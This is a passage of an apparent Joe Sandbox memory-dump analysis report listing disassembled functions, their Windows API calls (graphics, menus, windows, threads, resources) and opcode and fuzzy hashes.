Part of subcall function 02D36140: CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,02D34D03,00000000,02D34D8F), ref: 02D361D9
Part of subcall function 02D36140: ReleaseDC.USER32(00000000,00000000), ref: 02D361E4

CreateCompatibleDC.GDI32(00000000), ref: 02D34D05
SelectObject.GDI32(00000000,?), ref: 02D34D1E
SelectPalette.GDI32(00000000,?,000000FF), ref: 02D34D47
RealizePalette.GDI32(00000000), ref: 02D34D53

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: CriticalPaletteSection$CapsCreateDeviceEnterSelect$CompatibleHalftoneLeaveObjectRealizeRelease
String ID:
API String ID: 979337279-0
Opcode ID: 3733ca72e5a646bee0ea469508eb758540b5adb9c30a3f3e4baae684f0ab26b5
Instruction ID: fb35290b84625adef8da60c459f744c46accb5a1fed1063734d689561a18be50
Opcode Fuzzy Hash: 3733ca72e5a646bee0ea469508eb758540b5adb9c30a3f3e4baae684f0ab26b5
Instruction Fuzzy Hash: 9B31F534A00654EFD705EF69DA80D5DB3FAEF48720B2645A5E804AB361D734EE40DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 02D43B08 Relevance: 6.1, APIs: 4, Instructions: 72windowCOMMON

Download Yara Rule

APIs

GetMenuState.USER32(?,?,?), ref: 02D43B2B
GetSubMenu.USER32(?,?), ref: 02D43B36
GetMenuItemID.USER32(?,?), ref: 02D43B4F
GetMenuStringA.USER32(?,?,?,?,?), ref: 02D43BA2

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: Menu$ItemStateString
String ID:
API String ID: 306270399-0
Opcode ID: 736d5ebc603a1eb447476cabd31733b25a6ea9ca1aa7ea56341fade46b7190d1
Instruction ID: dee4ea7c88fde7a186fccefefbf4fbed93d25a7b8dcfd3aa12dcd29a74ed0f0f
Opcode Fuzzy Hash: 736d5ebc603a1eb447476cabd31733b25a6ea9ca1aa7ea56341fade46b7190d1
Instruction Fuzzy Hash: C7116731600254BB9B40EA6DDC84AAFB7EAEF49260F2444A9F819D7390DA30DD01CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02D2D6F2 Relevance: 6.1, APIs: 4, Instructions: 70threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 02D2D6FF
GetCurrentThreadId.KERNEL32 ref: 02D2D70E
EnterCriticalSection.KERNEL32(02DAD2EC), ref: 02D2D753
InterlockedExchange.KERNEL32(02D7AAF0,?), ref: 02D2D76F

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: CurrentThread$CriticalEnterExchangeInterlockedSection
String ID:
API String ID: 2380408948-0
Opcode ID: 705c20128bd4fa930f84d442d075e29bcd302dd6d0e949976cc4b41a50778376
Instruction ID: 1e0c90777343d186e697a6383b51735f74498763e54aee3761de4dedd2693214
Opcode Fuzzy Hash: 705c20128bd4fa930f84d442d075e29bcd302dd6d0e949976cc4b41a50778376
Instruction Fuzzy Hash: EA216D30A48354BFE711EFA8E850BAEB7FAEB25708F5184A4E402D3750D7799D48CB61

Uniqueness

Uniqueness Score: -1.00%

Function 02D62CC0 Relevance: 6.1, APIs: 4, Instructions: 57COMMON

Download Yara Rule

APIs

EnumWindows.USER32(Function_00052C50), ref: 02D62CF5
GetWindow.USER32(00000003,00000003), ref: 02D62D0D
GetWindowLongA.USER32(00000000,000000EC), ref: 02D62D1A
SetWindowPos.USER32(00000000,00000213,00000000,00000000,00000000,00000000,00000213,00000000,000000EC,00000003,00000003), ref: 02D62D59

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: Window$EnumLongWindows
String ID:
API String ID: 4191631535-0
Opcode ID: bf8e90981d8838e271809e70356f6e440fb6054f650930ee8405f26883b9a78b
Instruction ID: 283b48cd9bbd3ed19276f213a3e338bb7603ceb7f8914b1a1cadb26d174318b2
Opcode Fuzzy Hash: bf8e90981d8838e271809e70356f6e440fb6054f650930ee8405f26883b9a78b
Instruction Fuzzy Hash: 35117030644310AFEB20EA28DC88FA673E5EB05724F154165FD989B3E2C3709C41CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 02D49FD0 Relevance: 6.1, APIs: 4, Instructions: 56COMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(?), ref: 02D49FE5
MulDiv.KERNEL32(?), ref: 02D4A002
MulDiv.KERNEL32(?), ref: 02D4A01F
MulDiv.KERNEL32(?), ref: 02D4A03C

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34e5a025ebe54f33ca0d9c0a611c1777ba1d550d0cb8cff5f028c3b7c31a166c
Instruction ID: 7bc23adfd2f66a9a078ffe6803417c004ad4f60f02476947148d4b20fbcc783d
Opcode Fuzzy Hash: 34e5a025ebe54f33ca0d9c0a611c1777ba1d550d0cb8cff5f028c3b7c31a166c
Instruction Fuzzy Hash: D6011A213012582B8724BA3A5C54B5B3A5EDB89790F04807868299B347EE69EC0196B0

Uniqueness

Uniqueness Score: -1.00%

Function 02D2A28C Relevance: 6.1, APIs: 4, Instructions: 51COMMON

Download Yara Rule

APIs

FindResourceA.KERNEL32(?,?,?), ref: 02D2A2A3
LoadResource.KERNEL32(?,02D2A328,?,?,?,02D25D80,?,00000001,00000000,?,02D2A1CE,00000000,?), ref: 02D2A2BD
SizeofResource.KERNEL32(?,02D2A328,?,02D2A328,?,?,?,02D25D80,?,00000001,00000000,?,02D2A1CE,00000000,?), ref: 02D2A2D7
LockResource.KERNEL32(02D29E98,00000000,?,02D2A328,?,02D2A328,?,?,?,02D25D80,?,00000001,00000000,?,02D2A1CE,00000000), ref: 02D2A2E1

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: Resource$FindLoadLockSizeof
String ID:
API String ID: 3473537107-0
Opcode ID: 6666c0c5d2786686958728313b4b849162896db8d8533737764cf4319af02899
Instruction ID: 1db127be600cb4df8a87f7233754f325b3f950fe7135bb942f80622e8ae32381
Opcode Fuzzy Hash: 6666c0c5d2786686958728313b4b849162896db8d8533737764cf4319af02899
Instruction Fuzzy Hash: 40F069B32052247F4B49EF6CA980E6B77EEEE98360B20401AF918C7305DA31DD018BB4

Uniqueness

Uniqueness Score: -1.00%

Function 02D47ED4 Relevance: 6.0, APIs: 4, Instructions: 37threadCOMMON

Download Yara Rule

APIs

GetWindowThreadProcessId.USER32(00000000), ref: 02D47EE1
GetCurrentProcessId.KERNEL32(00000000,?,?,-00000010,00000000,02D47F4C,-000000F7,?,00000000,02D47B06,?,-00000010,?), ref: 02D47EEA
GlobalFindAtomA.KERNEL32(00000000), ref: 02D47EFF
GetPropA.USER32(00000000,00000000), ref: 02D47F16

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: Process$AtomCurrentFindGlobalPropThreadWindow
String ID:
API String ID: 2582817389-0
Opcode ID: 8a5121183f30426b60c2331d174ae95af80cc10e39e956ba22028ff0443ff325
Instruction ID: d8cab33aa094c65a94730350078464543b5f29ee737dc36f2bedb4214898de18
Opcode Fuzzy Hash: 8a5121183f30426b60c2331d174ae95af80cc10e39e956ba22028ff0443ff325
Instruction Fuzzy Hash: 35F0ED2960622277B7207BB9BE8097FA39EDE00310B280661FC44C2BA1DF15CC81C9B2

Uniqueness

Uniqueness Score: -1.00%

Function 02D46F74 Relevance: 6.0, APIs: 4, Instructions: 35threadCOMMON

Download Yara Rule

APIs

GetWindowThreadProcessId.USER32(?), ref: 02D46F81
GetCurrentProcessId.KERNEL32(?,00000000,?,02D43BE5,?,02D42CA1), ref: 02D46F8A
GlobalFindAtomA.KERNEL32(00000000), ref: 02D46F9F
GetPropA.USER32(?,00000000), ref: 02D46FB6

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: Process$AtomCurrentFindGlobalPropThreadWindow
String ID:
API String ID: 2582817389-0
Opcode ID: 508189e36c102314ff8c640adb36f8865f8647cf7d156368401eeb398b5ca483
Instruction ID: 508574ecea046165eadfca7dcdcc9d4deb8a213c1f1135680e95a4ab31980a21
Opcode Fuzzy Hash: 508189e36c102314ff8c640adb36f8865f8647cf7d156368401eeb398b5ca483
Instruction Fuzzy Hash: CFF0A05170121077AB2077B86C8082B6A8EEA063A07450A60FD86D2B92DA20CC458AF1

Uniqueness

Uniqueness Score: -1.00%

Function 02D624A8 Relevance: 6.0, APIs: 4, Instructions: 34threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 02D624C0
SetWindowsHookExA.USER32(00000003,02D62464,00000000,00000000), ref: 02D624D0
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 02D624EB
CreateThread.KERNEL32(00000000,000003E8,02D62408,00000000,00000000), ref: 02D6250F

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: CreateThread$CurrentEventHookWindows
String ID:
API String ID: 1195359707-0
Opcode ID: 15173caf103d297326814e9e0987f989cb261beb12bf4979c1e47822564abd07
Instruction ID: ebf3db72b9d6c13a0ca92d2d5fabee2f9c58650b81bac131eec85bf9dc8d823f
Opcode Fuzzy Hash: 15173caf103d297326814e9e0987f989cb261beb12bf4979c1e47822564abd07
Instruction Fuzzy Hash: EFF0DAB0AC43447FF635AB20AC1EF25379AD750B15F109855F50669FC0C7B12C94CA66

Uniqueness

Uniqueness Score: -1.00%

Function 02D3760C Relevance: 6.0, APIs: 4, Instructions: 29COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 02D37615
SelectObject.GDI32(00000000,058A00B4), ref: 02D37627
GetTextMetricsA.GDI32(00000000), ref: 02D37632
ReleaseDC.USER32(00000000,00000000), ref: 02D37643

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: MetricsObjectReleaseSelectText
String ID:
API String ID: 2013942131-0
Opcode ID: b023f3b3535285186bf0d741946785971fb34f1bac8604d97c4aa540421bccf2
Instruction ID: 2f89d6fc88d5abb9484020f80cce4def14715246a56d4f71191c5ba0ef26bd49
Opcode Fuzzy Hash: b023f3b3535285186bf0d741946785971fb34f1bac8604d97c4aa540421bccf2
Instruction Fuzzy Hash: 32E0265174393036E25221BAAC50FAF624DCF03260F081170FC449A7C0DB01DD0187F6

Uniqueness

Uniqueness Score: -1.00%

Function 02D321EC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 172COMMON

Download Yara Rule

APIs

Part of subcall function 02D314CC: EnterCriticalSection.KERNEL32(?,02D31509), ref: 02D314D0

CompareStringA.KERNEL32(00000400,00000001,00000000,?,00000000,Default,00000000,02D323E0,?,00000000,02D32408), ref: 02D3231B
CreateFontIndirectA.GDI32(?), ref: 02D323BD

Strings

Default, xrefs: 02D322E2, 02D322F0, 02D322F1

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: CompareCreateCriticalEnterFontIndirectSectionString
String ID: Default
API String ID: 249151401-753088835
Opcode ID: d5dd8ea4e54768ebbd75dfcca61edb5a4fb1f411c97e0edaf34d9fb523922eb2
Instruction ID: 13648d1a389936fefd0eaad6cf3984f9e276a6bbcc3b7989347264a4ed3bbe36
Opcode Fuzzy Hash: d5dd8ea4e54768ebbd75dfcca61edb5a4fb1f411c97e0edaf34d9fb523922eb2
Instruction Fuzzy Hash: E5615831E04288DFDB12DFA8D948B9DBBF6EF49314F1880A9D880A7356D3709E45CB65

Uniqueness

Uniqueness Score: -1.00%

Function 02D11D08 Relevance: 5.3, APIs: 4, Instructions: 330COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee8c33e1b0e8d88dc138e5a06e4d635de950214ffc47dcaa176df1f0baa49ba6
Instruction ID: 95e8ab721f517f8873af3ac426c496140ad7c22dac08f5b034bf1e39e8a75f81
Opcode Fuzzy Hash: ee8c33e1b0e8d88dc138e5a06e4d635de950214ffc47dcaa176df1f0baa49ba6
Instruction Fuzzy Hash: B6A1E3677106102BE718AA7CBC8437DB3D2DB85325F28427AE319CBBD5EB68CD45C690

Uniqueness

Uniqueness Score: -1.00%

Function 02D1A5FC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79threadCOMMON

Download Yara Rule

APIs

GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,02D1A6EA), ref: 02D1A682
GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,02D1A6EA), ref: 02D1A688

Strings

yyyy, xrefs: 02D1A65D

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: DateFormatLocaleThread
String ID: yyyy
API String ID: 3303714858-3145165042
Opcode ID: 8389239d6dc7750f4ba8e37b9abc6aaf99d0a4dd2f324c5430e1f53930be3fcc
Instruction ID: 779a1e8ad94b8c4d24e48e28973bdcdf4fc5302d507025afe5b77b7e5548f52e
Opcode Fuzzy Hash: 8389239d6dc7750f4ba8e37b9abc6aaf99d0a4dd2f324c5430e1f53930be3fcc
Instruction Fuzzy Hash: D3219C71A01668BFDB10EFA8E941AAEB3F9EF09700F4100A5F945E7B50D7349E40CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 02D4A8B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

IntersectRect.USER32(?,?,?), ref: 02D4A910
EqualRect.USER32(?,?), ref: 02D4A920

Strings

@, xrefs: 02D4A8F1

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: Rect$EqualIntersect
String ID: @
API String ID: 3291753422-2766056989
Opcode ID: d50d7f664358e52e2fa2b9c6811e0cf48d392c7708719f53a49ce50f6fc72534
Instruction ID: aaea19977a0ab0ca4b99530f2825fbc236bfe44574f51935cbc8043aaa568517
Opcode Fuzzy Hash: d50d7f664358e52e2fa2b9c6811e0cf48d392c7708719f53a49ce50f6fc72534
Instruction Fuzzy Hash: 5111A3316452586BD711DA6CC894BDEBBED9F49314F040291EC04EB392DB31DD05CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 02D3AF2C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(00000000), ref: 02D3AF7A
GetSystemMetrics.USER32(00000001), ref: 02D3AF8C

Part of subcall function 02D3AC98: GetProcAddress.KERNEL32(75BD0000,00000000), ref: 02D3AD17

Strings

MonitorFromPoint, xrefs: 02D3AF3E

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: MetricsSystem$AddressProc
String ID: MonitorFromPoint
API String ID: 1792783759-1072306578
Opcode ID: 30eaa1cef539f66f7b737d4ec0ae54456781f1d3845b4ec95180929d3f75dc96
Instruction ID: 2cc6c83d7e80fc7ce83f48790e8498b8846715cfc71a0f7ba11871307cb28ffd
Opcode Fuzzy Hash: 30eaa1cef539f66f7b737d4ec0ae54456781f1d3845b4ec95180929d3f75dc96
Instruction Fuzzy Hash: E5018173B44204AFDB139E58D848F9ABBA7EB42768F004819F985DB781D3709C56CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02D3AE04 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(00000000), ref: 02D3AE55
GetSystemMetrics.USER32(00000001), ref: 02D3AE61

Part of subcall function 02D3AC98: GetProcAddress.KERNEL32(75BD0000,00000000), ref: 02D3AD17

Strings

MonitorFromRect, xrefs: 02D3AE19

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: MetricsSystem$AddressProc
String ID: MonitorFromRect
API String ID: 1792783759-4033241945
Opcode ID: ea06413311ed62078486eb6de5f6e625c07ad6c785c7cbc262b676d898c7275d
Instruction ID: 3b93ada25d9c787ac76879220b14d5fe5e8b9213a85516bbbe778e19fee67993
Opcode Fuzzy Hash: ea06413311ed62078486eb6de5f6e625c07ad6c785c7cbc262b676d898c7275d
Instruction Fuzzy Hash: E4018179B402149FDB218A15D888F6AB79BE782359F048455EDC5EB351C371DC40CFB1

Uniqueness

Uniqueness Score: -1.00%

Function 02D3AD7C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(?), ref: 02D3ADDE

Part of subcall function 02D3AC98: GetProcAddress.KERNEL32(75BD0000,00000000), ref: 02D3AD17

GetSystemMetrics.USER32(?), ref: 02D3ADA4

Strings

GetSystemMetrics, xrefs: 02D3AD8C

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: MetricsSystem$AddressProc
String ID: GetSystemMetrics
API String ID: 1792783759-96882338
Opcode ID: f3abe7559964e42e91b56f4fb6dc88e4a76510f326393fd862300091c6642da7
Instruction ID: a41841474b99eed5d4c582c6e2ea10b16c573f6c624c14d83e3f86464c458d5f
Opcode Fuzzy Hash: f3abe7559964e42e91b56f4fb6dc88e4a76510f326393fd862300091c6642da7
Instruction Fuzzy Hash: 4EF090707552405AC7134B38F884A3A3647DB86236FA45B10A6924ABD4FE74CC40D710

Uniqueness

Uniqueness Score: -1.00%

Function 02D43194 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32keyboardCOMMON

Download Yara Rule

APIs

GetKeyState.USER32(00000010), ref: 02D431AF
GetKeyState.USER32(00000011), ref: 02D431C0

Strings

, xrefs: 02D431CF

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: State
String ID:
API String ID: 1649606143-3916222277
Opcode ID: 2331ea1744ccc5fc26b6c380624c2bd40bee78fb456a09ec618bf1e0a1072200
Instruction ID: 92d81ab0143327edd1473d3e26709b1a7659c34bdcae01e6991501926e845cb8
Opcode Fuzzy Hash: 2331ea1744ccc5fc26b6c380624c2bd40bee78fb456a09ec618bf1e0a1072200
Instruction Fuzzy Hash: 98E06862B0078113F651756C2C007E757E28F427A8F294AE6FEC01E2D2EB860D01A1B1

Uniqueness

Uniqueness Score: -1.00%

Function 02D167E4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 11memoryCOMMON

Download Yara Rule

APIs

TlsAlloc.KERNEL32 ref: 02D167ED
TlsGetValue.KERNEL32(00000026), ref: 02D16802

Strings

`Rq, xrefs: 02D16807

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: AllocValue
String ID: `Rq
API String ID: 1189806713-404319310
Opcode ID: 5880df11a287e524094fd6c4fb401717b518b502a9ea66b33d4c742f83f644a8
Instruction ID: 84b1b97a96d62ada9c0e01a13323d27096155a4a69d781717079d6f3b058f9b4
Opcode Fuzzy Hash: 5880df11a287e524094fd6c4fb401717b518b502a9ea66b33d4c742f83f644a8
Instruction Fuzzy Hash: D1C002A4D513106AEB01BFB5B51850937AEEF44345F044C25A500CBF40EB3DDC14DFA4

Uniqueness

Uniqueness Score: -1.00%

Function 02D68BD4 Relevance: 5.1, APIs: 4, Instructions: 72COMMON

Download Yara Rule

APIs

IsBadReadPtr.KERNEL32(?,00000004,?,00000004,?,00000008), ref: 02D68C08
IsBadWritePtr.KERNEL32(?,00000004,?,00000004,?,00000004,?,00000008), ref: 02D68C38
IsBadReadPtr.KERNEL32(?,00000008), ref: 02D68C57
IsBadReadPtr.KERNEL32(?,00000004,?,00000008), ref: 02D68C63

Memory Dump Source

Source File: 00000008.00000002.1707025240.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true

Associated: 00000008.00000002.1706966749.0000000002D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002D7A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.1707541930.0000000002EA1000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2d10000_pointer.jbxd

Yara matches

Similarity

API ID: Read$Write
String ID:
API String ID: 3448952669-0
Opcode ID: 264c576b14bcd0c9e02ae9879bb2a337787180729ecbd5a154cab2cb3c5d2fd4
Instruction ID: 60048c11796524fcb486b6b25029cdb240596b3b73a7e80cca463ec491856d18
Opcode Fuzzy Hash: 264c576b14bcd0c9e02ae9879bb2a337787180729ecbd5a154cab2cb3c5d2fd4
